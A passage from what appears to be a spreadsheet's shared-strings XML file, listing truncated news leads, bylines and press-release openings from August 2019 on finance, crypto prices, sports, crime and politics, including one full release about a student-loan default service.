    <t>The 10 best U.S. cities for early retirement are ranked according to metrics as varied as the effective income tax rate for retirees, the...</t>
  </si>
  <si>
    <t>PLAINVIEW, N.Y., Aug. 13, 2019 /PRNewswire/ -- Utilizing security seals is an effective way to avoid the tampering and theft that could...</t>
  </si>
  <si>
    <t>Cosmin Vasile</t>
  </si>
  <si>
    <t>If you're in the market for Samsung's most recent flagship smartphone, the Galaxy Note 10, there are plenty of deals to choose from. We're...</t>
  </si>
  <si>
    <t>Kroll Bond Rating Agency (KBRA) assigns preliminary ratings to 28 classes from Structured Agency Credit Risk (STACR®) 2019-FTR2 Notes,...</t>
  </si>
  <si>
    <t>Sophie Wills</t>
  </si>
  <si>
    <t>Campaigners call for increased awareness as FGM victims treated in north Derbyshire - Ilkeston Advertiser</t>
  </si>
  <si>
    <t>by liana walker</t>
  </si>
  <si>
    <t>GLADSTONE residents have a chance to become a part of the Grand Hotel's history to help celebrate its 121st birthday. The hotel will...</t>
  </si>
  <si>
    <t>QChi (CURRENCY:QCH) traded down 5.4% against the dollar during the 1-day period ending at 17:00 PM Eastern on August 9th. One QChi token...</t>
  </si>
  <si>
    <t>Simon Bristow</t>
  </si>
  <si>
    <t>Eight of the top stories from court this week It's been another busy week in the courts, where a whole range of cases and crimes in the...</t>
  </si>
  <si>
    <t>-- Revenues Increase 108% over Third Quarter 2018 -- -- Increasing Fiscal 2019 Revenue Guidance to $52 to $53 Million; Adjusting Net Loss...</t>
  </si>
  <si>
    <t>DUBLIN--(BUSINESS WIRE)--The "Jordan Catering Service Market Outlook to 2022 - By Type of Catering (Event Catering, Government/Defense...</t>
  </si>
  <si>
    <t>Even as high-probability riskscapture the minds of investors, there is a growing combination of lower-probability risks, that could create...</t>
  </si>
  <si>
    <t>By REX CRUM The Mercury News</t>
  </si>
  <si>
    <t>Apple may be putting more emphasis on services such as Apple Music and its upcoming Apple TV+ streaming television offering, but that...</t>
  </si>
  <si>
    <t>A former Connecticut woman convicted of her role in a two separate schemes to defraud Medicaid of millions of dollars has been sentenced to...</t>
  </si>
  <si>
    <t>PHOENIX, Aug. 7, 2019 /PRNewswire/ -- VEREIT, Inc. (NYSE: VER) ("VEREIT" or the "Company") announced today its operating results for the...</t>
  </si>
  <si>
    <t>LAS VEGAS, August 14, 2019 /PRNewswire-PRWeb/ -- Women discover men's shave clubs are not just for men. Advertising and the websites of...</t>
  </si>
  <si>
    <t>Jeremy Lydic</t>
  </si>
  <si>
    <t>YOUNGSTOWN, Ohio — Discussions on cybersecurity have moved from the IT strategy room to the board room as CEOs and other executives take...</t>
  </si>
  <si>
    <t>FAYETTEVILLE, Ark. -- Arkansas has dismissed forward Gabe Osabuohien from the men's basketball program. Coach Eric Musselman announced the...</t>
  </si>
  <si>
    <t>Latisha Jones</t>
  </si>
  <si>
    <t>Storeum (CURRENCY:STO) traded 14.5% lower against the U.S. dollar during the twenty-four hour period ending at 9:00 AM ET on August 22nd....</t>
  </si>
  <si>
    <t>Aimmune Therapeutics (NASDAQ:AIMT) had its price target cut by Royal Bank of Canada to $50.00 in a research note released on Friday, August...</t>
  </si>
  <si>
    <t>MINNEAPOLIS (AP) -- Seattle Seahawks wide receiver D.K. Metcalf will have minor knee surgery in an early setback for an offense counting on...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 14, 2019 /PRNewswire/ -- Republic, a leading investment platform and spinoff of AngelList, has launched the first-ever...</t>
  </si>
  <si>
    <t>© Provided by Australian Broadcasting Corporation The island's new passenger transfer vehicles have arrived ahead of the cruise ship...</t>
  </si>
  <si>
    <t>HAUPPAUGE, N.Y., Aug. 15, 2019 /PRNewswire/ -- Throughout life, there are many skills that one should learn and know. How to swim is an...</t>
  </si>
  <si>
    <t>DEERFIELD, Ill. --(BUSINESS WIRE) Walgreens is taking proactive measures to assist customers, team members and communities in the projected...</t>
  </si>
  <si>
    <t>Promoter Eddie Hearn says Dillian Whyte's negative tests from VADA are 'key evidence' against drug allegations and wants a verdict from...</t>
  </si>
  <si>
    <t>More solar energy homes planned in Dillon NBC MontanaA company is introducing a new and eco-friendly option that could help new homeowners...</t>
  </si>
  <si>
    <t>Biswajeet Banerjee</t>
  </si>
  <si>
    <t>More than a million Indians have planted 220 million trees in a government campaign to tackle climate change and improve the environment in...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Aug. 21, 2019 /PRNewswire/ -- The growth of the Global Automotive Automatic Transmission (AT) System Market has been surging...</t>
  </si>
  <si>
    <t>Share: Share Tweet Email Share: Share Tweet Email KTRK THE WOODLANDS, Texas -- Baseball is all about teamwork, but a scout was all on...</t>
  </si>
  <si>
    <t>AGENCY: United States International Trade Commission. ACTION: Notice. SUMMARY: The Commission hereby gives notice that it will proceed...</t>
  </si>
  <si>
    <t>Lobstex (CURRENCY:LOBS) traded down 1.5% against the U.S. dollar during the 24 hour period ending at 11:00 AM Eastern on August 14th....</t>
  </si>
  <si>
    <t>Dawn Hodson</t>
  </si>
  <si>
    <t>The ballots have been sent and now it’s up to the voters on the Divide to decide whether or not to increase the assessment on their...</t>
  </si>
  <si>
    <t>Todd Black</t>
  </si>
  <si>
    <t>Nintendo is on a hot streak with its 1st party titles right now, and it’s aiming to continue that with its Mobile Initiative, for it’s...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- The Cushing® Energy Income Fund (formerly known as the Cushing® Royalty &amp; Income Fund) (NYSE: SRF) declared a distribution...</t>
  </si>
  <si>
    <t>0 comment Taylor Swift and the Jonas Brothers were among the winners at the 2019 Teen Choice Awards. The annual ceremony is voted for by...</t>
  </si>
  <si>
    <t>Henry Schein, Inc. (Nasdaq: HSIC) reminds its customers in the Caribbean, Florida, and throughout the Southeastern U.S. that the Henry...</t>
  </si>
  <si>
    <t>By Chris Kocher</t>
  </si>
  <si>
    <t>Study from Binghamton University researchers could lead to better, cheaper microphones, gyroscopes, pressure sensors and more</t>
  </si>
  <si>
    <t>Glancy Prongay &amp; Murray LLP (“GPM”), a national investors rights law firm, announces that a class action lawsuit has been filed on behalf...</t>
  </si>
  <si>
    <t>CINCINNATI (AP) — Authorities say a serial killer who claims to have murdered 90 women will plead guilty and be sentenced this week to...</t>
  </si>
  <si>
    <t>Wall Street brokerages expect EnerSys (NYSE:ENS) to announce $1.21 earnings per share for the current quarter, Zacks Investment Research...</t>
  </si>
  <si>
    <t>Petra Diamonds (LON:PDL)‘s stock had its “sell” rating restated by investment analysts at Berenberg Bank in a research report issued to...</t>
  </si>
  <si>
    <t>TSX-V: MKO VANCOUVER, Aug. 19, 2019 /CNW/ - Mako Mining Corp. (TSX-V: MKO) ("Mako" or the "Company") is pleased to announce additional...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 26, 2019 /PRNewswire/ -- Read the full report: https://www.reportlinker.com/p05810389/?utm_source=PRN 4 Billion, driven by...</t>
  </si>
  <si>
    <t>KINGSPORT, Tenn. (AP) -- Cristopher Pujols hit a run-scoring single in the eighth inning, leading the Kingsport Mets to a 5-4 win over the...</t>
  </si>
  <si>
    <t>Site welfare equipment specialist, Garic, has announced 2018 was a record year for the company – which its MD puts down to ‘Quality...</t>
  </si>
  <si>
    <t>“Copper Mining Market” WiseGuyReports.com adds “Copper Mining Market 2018 Global Analysis, Growth, Trends and Opportunities Research Report...</t>
  </si>
  <si>
    <t>Pennsylvania American Water announced today that customers will begin receiving water from the newly completed $50 million Ellwood Water...</t>
  </si>
  <si>
    <t>Cash flow financier Australian Invoice Finance has added two new business development managers to its sales team to drive growth in two of...</t>
  </si>
  <si>
    <t>Once again, the entry deadline is Friday, August 8, 2019 and finalists will be recognized at an awards luncheon this November in New York...</t>
  </si>
  <si>
    <t>By Nathaniel Meyersohn, CNN Business Instagram is great for sharing photos, interacting with celebrities and discovering trendy looks —...</t>
  </si>
  <si>
    <t>Lowering the rate set by the Fed on Wednesday, which It was a relief to emerging countries like ArgentinaEnded up being Adverse in the...</t>
  </si>
  <si>
    <t>Police are searching a caravan site around three miles from where a newlywed policeman was dragged along by a vehicle before he died.</t>
  </si>
  <si>
    <t>Dublin, Aug. 29, 2019 (GLOBE NEWSWIRE) -- The "Electrochemical Instruments - Market Analysis, Trends, and Forecasts" report has...</t>
  </si>
  <si>
    <t>James Conley</t>
  </si>
  <si>
    <t>IXT (CURRENCY:IXT) traded down 2.7% against the US dollar during the 24 hour period ending at 17:00 PM ET on August 9th. IXT has a market...</t>
  </si>
  <si>
    <t>Darren Chu, Cfa -</t>
  </si>
  <si>
    <t>Join the world's largest asset manager and 2 of the world's 5 largest hedge funds by AUM as daily readers of Tradable Patterns' technical...</t>
  </si>
  <si>
    <t>Pep Guardiola claims Raheem Sterling can still reach but an alternative stage. Sterling is now firmly established as one of the Premier...</t>
  </si>
  <si>
    <t>Chloe Morgan For Mailonline</t>
  </si>
  <si>
    <t>Suzie Aries, 27, from Buckinghamshire, met Karl one month before diagnosis Was diagnosed with rare and aggressive form of Ovarian cancer...</t>
  </si>
  <si>
    <t>Las Vegas Global Economic Alliance (LVGEA) has appointed four new members to serve the organization on the Board of Directors, known as...</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.6 in 2019 Q1. Its up 0.22, from 1.38 in 2018Q4. It increased, as 11 investors sold CPSI shares while 37...</t>
  </si>
  <si>
    <t>The Dodge Momentum Index retreated 4.6% in July to 138.9 (2000=100), down from the revised June reading of 145.6. The Momentum Index,...</t>
  </si>
  <si>
    <t>Global Electric Bus Market 2019 Trends, Market Share, Industry Size, Growth, Sales, Opportunities, Analysis and Forecast To 2024</t>
  </si>
  <si>
    <t>Darrell Selby</t>
  </si>
  <si>
    <t>Sentiment for United Natural Foods Inc (NASDAQ:UNFI) United Natural Foods Inc (NASDAQ:UNFI) institutional sentiment increased to 1.12 in...</t>
  </si>
  <si>
    <t>CAPROCK Group Inc. decreased its stake in Rockwell Automation (NYSE:ROK) by 22.6% during the 2nd quarter, according to the company in its...</t>
  </si>
  <si>
    <t>The key to retaining customers lies in establishing and supporting personalized customer experiences, which can become more achievable...</t>
  </si>
  <si>
    <t>By Victoria Uwumarogie</t>
  </si>
  <si>
    <t>The journalist and TV host is married to music executive Steven Greener, and when the couple hit it off and moved in together, she tried...</t>
  </si>
  <si>
    <t>JOHANNESBURG, Aug. 28, 2019 /PRNewswire/ -- It is that time of the year again, when healthcare professionals, industry experts and leaders...</t>
  </si>
  <si>
    <t>Youngstown, Ohio's #1 Locally owned, locally connected television news station.</t>
  </si>
  <si>
    <t>Two years after the liberate of Baahubali: The Conclusion, Prabhas is back on the silver screen with lots-expected action mystery Saaho....</t>
  </si>
  <si>
    <t>Press Association 2019</t>
  </si>
  <si>
    <t>A man is due to appear in court over the murder of a postal worker in 1994. The 60-year-old has also been charged with membership of a...</t>
  </si>
  <si>
    <t>Legato Capital Management LLC lifted its holdings in shares of Grupo Aeroportuario dl Srst SAB CV (NYSE:ASR) by 20.6% during the second...</t>
  </si>
  <si>
    <t>SOURCE Lincoln International LLC Lincoln Middle Market Index grew 2.8%, compared to the S&amp;P of 3.1% Overall growth among private middle...</t>
  </si>
  <si>
    <t>- PRLog -- BYD (Build Your Dreams) announced two members of the Harbor Trucking Association, GSC Logistics, serving the Port of Oakland,...</t>
  </si>
  <si>
    <t>Champion flanker David Pocock came agonisingly close to a Bledisloe Cup call-up before Wallabies coach Michael Cheika stepped in to make...</t>
  </si>
  <si>
    <t>A Russian passenger jet made an emergency landing just after takeoff from an airport in Moscow. The plane collided with a flock of gulls,...</t>
  </si>
  <si>
    <t>DNA Web Team ;Snehadri Sarkar;DNA webdesk</t>
  </si>
  <si>
    <t>Dream11 Prediction - Patna Pirates vs U Mumba PAT vs MUM Pro Kabaddi League Dream11 Team: Fantasy kabaddi predictions and tips for Patna...</t>
  </si>
  <si>
    <t>Mad River Investors lessened its holdings in shares of Texas Pacific Land Trust (NYSE:TPL) by 0.3% during the 2nd quarter, according to its...</t>
  </si>
  <si>
    <t>Boeing Co has been awarded a $500 million contract for providing F-15QA aircrew and maintenance training to Qatar's air force, the Pentagon...</t>
  </si>
  <si>
    <t>Norwich and Crystal Palace have been dumped out of this season’s Carabao Cup on Tuesday night. Daniel Farke made 11 changes for their trip...</t>
  </si>
  <si>
    <t>Charles Blunt</t>
  </si>
  <si>
    <t>Siemens Healthineers (ETR:SHL) has been given a €38.00 ($44.19) price objective by Independent Research in a note issued to investors on...</t>
  </si>
  <si>
    <t>Agriculture Product Rapid Test Service Market is continuously growing across the world over the coming years. The major driving factor of...</t>
  </si>
  <si>
    <t>Aug. 26 occurs to be National Dog Day -- the best time to deliver your puppy something particular (as though you don't try this all of the...</t>
  </si>
  <si>
    <t>Investors sentiment decreased to 1.36 in Q1 2019. Its down 0.52, from 1.88 in 2018Q4. It worsened, as 7 investors sold SIFI shares while 15...</t>
  </si>
  <si>
    <t>Simply Wall St</t>
  </si>
  <si>
    <t>IHS Markit Ltd. (NYSE:INFO) closed yesterday at $64.41, which left some investors asking whether the high earnings potential can still be...</t>
  </si>
  <si>
    <t>Ben Stokes is the odds-on favourite to win the BBC Sports Personality of the Year prize after his Headingley heroics on Sunday. The...</t>
  </si>
  <si>
    <t>Dillard’s, Inc. (NYSE: DDS) (the “Company” or “Dillard’s”) announced that the Board of Directors declared a cash dividend of $0.15 per...</t>
  </si>
  <si>
    <t>by Stock Muse Staff</t>
  </si>
  <si>
    <t>Wall Street pre-market Wednesday was cautious, with US stock market index futures pointing to an opening bell roughly even with Tuesday’s...</t>
  </si>
  <si>
    <t>cory</t>
  </si>
  <si>
    <t>Fiber is good. Lots of fiber is moving. Not sure who created it but Amazon is selling "Poop Like A Champion" ultra fiber cereal for $12 a...</t>
  </si>
  <si>
    <t>Ewan Moore</t>
  </si>
  <si>
    <t>Capcom Following on from reports earlier in the month that Capcom was secretly testing a new Resident Evil game, it looks as if we’re now...</t>
  </si>
  <si>
    <t>President Donald Trump on Thursday defended his handling of the U.S. economy and trade war with China as recession fears have suddenly cast...</t>
  </si>
  <si>
    <t>Prosecutors are seeking a mental evaluation for a man accused of opening fire during a traffic dispute with another father during a morning...</t>
  </si>
  <si>
    <t>Silver Spring, MD, Aug. 27, 2019 (GLOBE NEWSWIRE) -- The Solid Waste Association of North America (SWANA) is excited to announce the...</t>
  </si>
  <si>
    <t>The Explainer Video Company, a Santa Clara, California, based digital marketing agency, announced the launch of an updated range of...</t>
  </si>
  <si>
    <t>ALBANY, New York, Aug. 22, 2019 /PRNewswire/ -- As per a recent report by Transparency Market Research, the global industrial gas...</t>
  </si>
  <si>
    <t>Katherine Hessel</t>
  </si>
  <si>
    <t>FERGUSON, Mo. – It has been five years since Michael Brown was shot and killed by a police officer in Ferguson. In that time, Ferguson has...</t>
  </si>
  <si>
    <t>The president of Nauru has heaped glowing praise on ally Taiwan, highlighting a hurdle for China in its attempts to increase its presence...</t>
  </si>
  <si>
    <t>CAIRO Sudan's autocratic former President Omar al-Bashir has arrived in court amid tight security for the second week of his trial on...</t>
  </si>
  <si>
    <t>Check out the latest community post from one of your neighbors. (The views expressed in this post are the author’s own.)</t>
  </si>
  <si>
    <t>Charter Trust Co. raised its position in shares of Parker-Hannifin Corp (NYSE:PH) by 7.4% in the 2nd quarter, according to the company in...</t>
  </si>
  <si>
    <t>Fox 11 Sports</t>
  </si>
  <si>
    <t>GREEN BAY (WLUK) - The Houston Texans were in town to practice the Green Bay Packers ahead of the first preseason game for each team which...</t>
  </si>
  <si>
    <t>TUNIS, TUNISIA — Tunisia's independent electoral body says 26 candidates have qualified to run in the country's...</t>
  </si>
  <si>
    <t>New Jersey, NJ, Aug. 08, 2019 (GLOBE NEWSWIRE) -- Increasing resistance against antibiotics, increasing burden of antibiotic-resistant...</t>
  </si>
  <si>
    <t>After a recent review, we have noted that shares of Zumiez Inc. (NASDAQ:ZUMZ) have an average target price of $23. This is the consensus...</t>
  </si>
  <si>
    <t>SAN FRANCISCO, Aug. 5, 2019 /PRNewswire/ -- Global Chest Drainage Unit Market is projected to exhibit a healthy CAGR during the forecast...</t>
  </si>
  <si>
    <t>VANCOUVER — The Vancouver Whitecaps and winger Lucas Venuto have parted ways. Venuto, 24, made 13 starts and 22 appearances in Major...</t>
  </si>
  <si>
    <t>LAKE CITY, Ga., Aug. 27, 2019 /PRNewswire-PRWeb/ -- Clayton Signs, Inc., a sign manufacturer just outside of Atlanta, GA, announces its...</t>
  </si>
  <si>
    <t>Philip Federico</t>
  </si>
  <si>
    <t>Iron Harvest Release Date Announced Just-Released gamescom Trailer Transports You to the Alternative Diesel-Punk World of 1920+ Larkspur,...</t>
  </si>
  <si>
    <t>CARLSBAD, Calif., Aug. 6, 2019 /PRNewswire/ -- eduassist.me launched a new business model and software platform to help companies take care of their lower-to-mid paid employees to relieve them of the harsh realities of Federal student loan default and/or enroll them into affordable Income-based Repayment programs, as low as $0/month. "What sets us apart is our core mission to help change lives with a faster, more dramatic, cost-effective solution instead of just making extra payments towards a student loan or shaving off a few dollars a month with a loan refinance", said Lois Preister, head of the Loan Processing Department at Carlsbad, CA-based eduassist.me. "Our unique philosophy is not to pay off the loans faster, but to immediately help reduce loan payments, as much as possible, so that the balance is forgiven with Federal programs." continues Mrs. Preister. Default borrowers are charged an 18% penalty, hundreds or thousands of dollars in collection fees are added, and a very damaging rating on their credit reports. Mrs. Priester goes on to say, "The damage to the borrower's credit results in the same category as that of a bankruptcy and may remain on their credit report for up to 10 years. They cannot qualify for any traditional credit cards, auto loans, mortgages, and they can't go back to school. Even certain professional licenses and driver's licenses may be suspended until the loans are returned to good standing." By assisting people to get out of default and/or enrolling into a minimal payment, it can be a life-changing and life-long solution to free employees of the crippling trap of student loan default. Student loan default isn't just a "Millennial problem" its everyone across the board in their 40's and 50's, for themselves, and/or Parent Plus loans for their kids. About eduassist.me With offices in California and Florida, eduassist.me provides a software platform and experienced professionals to help companies assist their lower-paid employees get out of Federal student loan default and/or enroll them into affordable Income-based Repayment programs. What sets eduassist.me apart is our mission to help change lives with a faster and cost-effective solution by immediately reducing loan payments as much as possible so that the balance is forgiven with Federal programs. Both the sponsoring company and employees may pay significantly less per month than any other student loan repayment program. For more information on how eduassist.me is changing lives, please visit www.eduassist.me. Media Contact: Thomas Ryan (760) 530-6860 219274@email4pr.com View original content to download multimedia:http://www.prnewswire.com/news-releases/new-service-launched-to-assist-companies-with-lower-paid-employees-to-get-out-of-student-loan-default-and-get-enrolled-into-forgiveness-programs-300896978.html SOURCE eduassist.me © 2019 PRNewsWire. All Rights Reserved More Trending News &amp; Market Analysis</t>
  </si>
  <si>
    <t>BALTIMORE, Md., August 22, 2019 /PRNewswire-PRWeb/ -- Great Place to Work and FORTUNE have honored Brightview Senior Living as one of the...</t>
  </si>
  <si>
    <t>The Federal Reserve debated cutting interest rates more aggressively at its July meeting, although central bankers were united in wanting...</t>
  </si>
  <si>
    <t>Cannae (NYSE:CNNE) was upgraded by analysts at TheStreet from a “c” rating to a “b-” rating in a note issued to investors on Thursday,...</t>
  </si>
  <si>
    <t>In case you were worried about a possible teacher strike … Seattle Public Schools just announced that negotiators for the district and its...</t>
  </si>
  <si>
    <t>By RICARDO ALONSO-ZALDIVAR Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Democratic presidential candidates are split over eliminating employer-provided health insurance under "Medicare for...</t>
  </si>
  <si>
    <t>Zacks Investment Research upgraded shares of Sonim Technologies (NASDAQ:SONM) from a hold rating to a buy rating in a report issued on...</t>
  </si>
  <si>
    <t>MILWAUKEE (AP) — The leader of Wisconsin’s economic development agency says he’ll step down next week. The Milwaukee Journal Sentinel...</t>
  </si>
  <si>
    <t>By JP Sottile</t>
  </si>
  <si>
    <t>Immigration Trump’s Immigration Crackdown Is Quietly Targeting Labor Protections Environment &amp; Health Intergenerational Trauma Is a...</t>
  </si>
  <si>
    <t>SANAA, Yemen — Yemen's internationally recognized government accused the Emirati air force of attacking its troops Thursday as they were...</t>
  </si>
  <si>
    <t>By:                                       Kaitlin Gates</t>
  </si>
  <si>
    <t>Summer is coming to an end soon and before you know it, we’ll be swapping swimsuits for sweaters and fall will officially take over. But...</t>
  </si>
  <si>
    <t>by Nicole Pierre, Kate Kyriacou</t>
  </si>
  <si>
    <t>A SUNSHINE Coast community's frantic search for a three-year-old girl who went missing on a rural property has ended in heartache. More...</t>
  </si>
  <si>
    <t>PARKER GABRIEL Lincoln Journal Star</t>
  </si>
  <si>
    <t>In an ideal world, Nebraska assistant coach Barrett Ruud would have more than three options he felt good about putting on the field for his...</t>
  </si>
  <si>
    <t>Shan Goodwin</t>
  </si>
  <si>
    <t>BEEF producers are once again heading into spring weighing up critical feed-or-sell decisions against the backdrop of an unattractive...</t>
  </si>
  <si>
    <t>Nokia Corporation Stock Exchange Release August 22, 2019 at 09:30 (CEST +1) Nokia appoints Gabriela Styf Sjöman as Chief Strategy...</t>
  </si>
  <si>
    <t>Plains All American Pipeline (NYSE: PAA) spent the past couple of years shoring up its financial profile by selling assets. That gave it...</t>
  </si>
  <si>
    <t>ATLANTA, Aug. 12, 2019 /PRNewswire/ -- We admit it, we're a little cheesy. Starting today we're going to be a lot cheesier as Mac &amp; Cheese...</t>
  </si>
  <si>
    <t>PWMania.com Staff</t>
  </si>
  <si>
    <t>– In an interview with WrestlingInc.com, Mark Henry was asked about getting back in a WWE ring and here was Henry’s response: “I would say...</t>
  </si>
  <si>
    <t>Billionaire industrialist David H. Koch, who with his older brother, Charles, transformed American politics by pouring their riches into...</t>
  </si>
  <si>
    <t>Los Angeles, CA, August 07, 2019 --(PR.com)-- Once Wikipedia.org decided to modify their general definition and description of what the...</t>
  </si>
  <si>
    <t>Former Executive Editor of Fast Company, Robert Safian, to moderate diverse panel of executive HR leaders SAN FRANCISCO and TORONTO, Aug....</t>
  </si>
  <si>
    <t>Postmedia News</t>
  </si>
  <si>
    <t>One could say this British woman’s boyfriend was a tad possessive. Zoe Scholefield of Wakefield, West Yorkshire recently wanted to attend a...</t>
  </si>
  <si>
    <t>If passed into law in its current form, the SECURE Act could eliminate the Stretch IRA. Kent, WA -- (ReleaseWire) -- 08/08/2019 -- In May...</t>
  </si>
  <si>
    <t>By MELINDA DESLATTE Associated Press</t>
  </si>
  <si>
    <t>FILE- In this Nov. 6, 2007 file photo, Gov. Kathleen Babineaux Blanco is greeted by students of Maplewood Middle School in Sulphur, La....</t>
  </si>
  <si>
    <t>HIV-positive children who grow up in institutions like Shraddha Sanjivani Child Care Home (SSCCH) in Odishas Gopalpur face major challenges...</t>
  </si>
  <si>
    <t>U.S. wholesale inventories were revised lower to show them unchanged in June, indicating a slowdown in the pace of inventory accumulation...</t>
  </si>
  <si>
    <t>On the 50th anniversary of the original three-day festival came a two-day music extravaganza in the backyard of one of Woodstock's most...</t>
  </si>
  <si>
    <t>CLEAR LAKE, Iowa (AP) — The Latest on nearly all 2020 Democratic presidential candidates speaking at Iowa's "Wing Ding" fundraiser (all...</t>
  </si>
  <si>
    <t>PLAYA BAGDAD, Mexico - At the very eastern end of the U.S.-Mexico border there's a long strip of sand where the Rio Grande meets the sea....</t>
  </si>
  <si>
    <t>Travel PR News Editor</t>
  </si>
  <si>
    <t>Qatar Airways will be the Official Airline Partner of the Qatar Goodwood Festival DOHA, Qatar, 2019-Aug-09 — /Travel PR News/ — Qatar...</t>
  </si>
  <si>
    <t>on These Are The Most Intelligent Zodiac Signs, So Don’t Bother Trying To Outsmart Them</t>
  </si>
  <si>
    <t>The meaning of intelligence is relative, but it isn’t hard to distinguish either. Personally, I consider someone who is both a logical...</t>
  </si>
  <si>
    <t>TAIPEI, Taiwan, Aug. 13, 2019 /PRNewswire/ -- Egis Technology Inc. (6462.TWO) reported 2Q19 revenue of NT$1,899mn, up 36% QoQ, and up 28%...</t>
  </si>
  <si>
    <t>Arsenal have signed forward Nicolas Pepe from French club Lille for a club-record fee. Financial details of the transfer have not been...</t>
  </si>
  <si>
    <t>Matt Posky</t>
  </si>
  <si>
    <t>When General Motors debuted the 2020 Chevrolet Corvette, the automaker promised it would start below $60,000. It’s just barely been able to...</t>
  </si>
  <si>
    <t>Justin Bieber 's been in collaboration mode this year, joining Ariana Grande onstage at Coachella, releasing a single with Ed Sheeran,...</t>
  </si>
  <si>
    <t>Here will take a quick scan of Earnings Yield information on shares of Morgan Advanced Materials plc (LSE:MGAM). Currently, the Earnings to...</t>
  </si>
  <si>
    <t>MONTREAL, Aug. 29, 2019 /PRNewswire/ - At the Oshima Shipyard in Japan, Fednav Limited took delivery today of the Federal Montreal, its...</t>
  </si>
  <si>
    <t>August 26, 2019 - /PressAdvantage/ - Ocean City, MD - As one of the most professional and reliable home buying companies on the market,...</t>
  </si>
  <si>
    <t>Court Reporter</t>
  </si>
  <si>
    <t>A VIOLENT couple have been jailed after a late night brawl in McDonald's left one customer with a large gash to his head when he was struck...</t>
  </si>
  <si>
    <t>Glancy Prongay &amp; Murray LLP (“GPM”) announces an investigation on behalf of MBIA Inc. (“MBIA” or the “Company”) (NYSE: MBI) investors...</t>
  </si>
  <si>
    <t>Canopy Rivers Inc. ("Canopy Rivers" or the "Company") (TSXV:RIV.VN) (OTC:CNPOF) is pleased to announce that it has received conditional...</t>
  </si>
  <si>
    <t>Jared Coughlin</t>
  </si>
  <si>
    <t>Chronobank (CURRENCY:TIME) traded 3.8% lower against the US dollar during the 1 day period ending at 19:00 PM Eastern on August 31st....</t>
  </si>
  <si>
    <t>DUBLIN, Aug. 15, 2019 /PRNewswire/ -- The "Middle East Power Rental Market (2019-2025): Market Forecast By Types (Diesel and Gas), By kVA...</t>
  </si>
  <si>
    <t>Watch the First Teaser for Jennifer Aniston-Reese Witherspoon Apple Series 'The Morning Show' (Video) The first teaser for Jennifer Aniston...</t>
  </si>
  <si>
    <t>TEMPE, Ariz. (AP) — Arizona State University football players are returning to a newly renovated training camp, restoring a beloved...</t>
  </si>
  <si>
    <t>Italy's economy minister is trying to reassure markets as political leaders squabble in uphill dealings for a new government</t>
  </si>
  <si>
    <t>(BPT) - 1. Go reusable. Did you know that the average plastic grocery bag has a lifespan of 12 minutes? Pick up a reusable grocery bag or...</t>
  </si>
  <si>
    <t>WASHINGTON, Aug. 10, 2019 /PRNewswire-PRWeb/ -- Expert advisory firm Newport, LLC announces the much-anticipated e-Book refresh of the...</t>
  </si>
  <si>
    <t>AE Wealth Management LLC raised its holdings in Alphabet Inc (NASDAQ:GOOG) by 208.5% in the second quarter, according to its most recent...</t>
  </si>
  <si>
    <t>By Clinton Nagel Guest columnist</t>
  </si>
  <si>
    <t>Over many decades, generations of people who value wildlands worked tirelessly advocating for the complete and permanent protection of the...</t>
  </si>
  <si>
    <t>Global Photographic Paper Market is estimated to grow considerably in the forecast period owing to the increasing applications in...</t>
  </si>
  <si>
    <t>Bruges, Belgium, August 09, 2019 --(PR.com)-- The Daytona chronograph has become the hallmark of the world-famous watch manufacture, Rolex....</t>
  </si>
  <si>
    <t>AS Monaco's new signing Wissam Ben Yedder says he hopes Radamel Falcao stays with the club, amid Galatasaray rumors</t>
  </si>
  <si>
    <t>Former Elba Lady Tigers standout Amaysia Whitfield, a 2019 graduate of Elba High School, signed a basketball scholarship with LBW Community...</t>
  </si>
  <si>
    <t>MADISON HEIGHTS, Mich., Aug. 29, 2019 /PRNewswire/ -- The BetterInvesting 100 Index (BIXX), reflecting the portfolios of Main Street...</t>
  </si>
  <si>
    <t>Marchex (NASDAQ: MCHX), a leading provider of call analytics that drive, measure, and convert callers into customers, today released new...</t>
  </si>
  <si>
    <t>Ben Badham is managing director of record-breaking North Wales firm, BGB Scaffolding</t>
  </si>
  <si>
    <t>The Value Composite 2 (VC2) is a ranking system that is calculated by using the price to book value, price to sales, EBITDA to EV, price to...</t>
  </si>
  <si>
    <t>Norman Tucker</t>
  </si>
  <si>
    <t>During the biodiversity presentation, the First Lady was escorted to three displays by a youth member to learn more about their marine life...</t>
  </si>
  <si>
    <t>The U.S.-China Trade war is making its effects apparent in higher freight costs. This could certainly put transportation-focused...</t>
  </si>
  <si>
    <t>Dublin, Aug. 14, 2019 (GLOBE NEWSWIRE) -- The "Global Motorcycle Advanced Driver Assistance System (ADAS) Market 2019-2023" report...</t>
  </si>
  <si>
    <t>Invitation Homes Inc (NYSE:INVH) has been assigned an average rating of “Buy” from the nine brokerages that are currently covering the...</t>
  </si>
  <si>
    <t>CHARLOTTE, N.C., Aug. 22, 2019 (GLOBE NEWSWIRE) -- SPX Corporation (NYSE:SPXC) announced today that Paul Clegg, Vice President, Investor...</t>
  </si>
  <si>
    <t>LONDON--(BUSINESS WIRE)--Aug 1, 2019-- The global electrocardiography devices (ECG) market is expected to post a CAGR of over 6% during...</t>
  </si>
  <si>
    <t>0 comment A newlywed couple still wearing their tuxedo and wedding dress have been killed in a crash just minutes after they got married....</t>
  </si>
  <si>
    <t>Amazon’s Forever will not return for Season 2, the online giant has confirmed. The show, which is created by Parks and Recreation’s Alan...</t>
  </si>
  <si>
    <t>ShowerCap</t>
  </si>
  <si>
    <t>I miss the old, light, mostly-boring news. Reading the paper today is like strolling down to the local dinner theatre, expecting a...</t>
  </si>
  <si>
    <t>Bioengineers are studying heart disease with paper-based structures that mimic the layered nature of aortic valves, the tough, flexible...</t>
  </si>
  <si>
    <t>Katherine Ripley</t>
  </si>
  <si>
    <t>A cow can be a great addition to the household. But how much does a cow cost and where can you buy one? Learn more inside.</t>
  </si>
  <si>
    <t>Neutra (OTCQB: NTRR) is an early-stage research and development company committed to bringing modern, healthy-living solutions to a...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / August 21, 2019 / The securities litigation law firm of The Gross Law Firm issues the following notice on...</t>
  </si>
  <si>
    <t>ASHOK SHARMA Associated Press</t>
  </si>
  <si>
